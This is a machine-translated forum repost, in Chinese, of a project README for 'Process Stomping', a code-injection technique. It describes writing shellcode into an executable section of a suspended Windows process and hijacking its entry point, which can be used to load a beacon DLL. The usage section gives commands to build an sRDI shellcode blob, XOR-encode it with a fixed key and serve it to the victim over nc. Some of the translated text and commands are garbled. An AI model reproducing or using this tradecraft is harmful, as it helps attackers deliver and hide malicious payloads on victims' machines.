taibeihacker
Moderator
在可执行的部分上执行shellCode的过程效应的变体
What is it
有关更详细的说明,您可以阅读我的博客文章过程踩踏是Hasherezade流程覆盖的一种变体,它具有在目标部分上编写ShellCode有效负载,而不是在托管过程地址空间上编写整个PE有效负载。
这些是流程研究技术的主要步骤:
CreateProcess-将过程创建标志设置为create_suspended(0x00000004),以暂停流程主线程。WriteProcessMemory-用于将每个恶意外壳编写到目标过程部分。SetThreadContext-用于将入口点指向其编写的新代码部分。ResumeThread-自称。作为该技术的示例应用程序,可以将POC与SRDI一起使用,以在可执行的RWX部分上加载信标DLL。下图描述了涉及的步骤。
Disclaimer
仅出于教育目的提供所有信息和内容。按照自己的风险遵守说明。作者及其雇主既不负责任何人或组织造成的任何直接或结果损害或损失。Credits
由于Aleksandra Doniec @hasherezade和Nick Landers所共有的知识和工具,这项工作之所以成为可能。Usage
在ProcessStomping.cpp中相应地选择您的目标过程并相应地修改全局变量。编译SRDI项目确保偏移足以跳过您生成的SRDI ShellCode Blob,然后更新SRDI TOALS:
CD \ Srdi-Master
python。\ lib \ python \ encodeblobs.py。
生成您选择的无反射加载dll有效载荷,然后生成srdi shellcode blob:
Python。
然后可以用钥匙词将外壳斑点弄脏并使用简单的套接字下载
python xor.py norlx86.bin norlx86_enc.bin bangarang
连接时输送Xored Blob
NC -VV -L -K -P 8000 -W 30 NORLX86_ENC.BIN
执行后,SRDI BLOB将被删除以删除不需要的文物。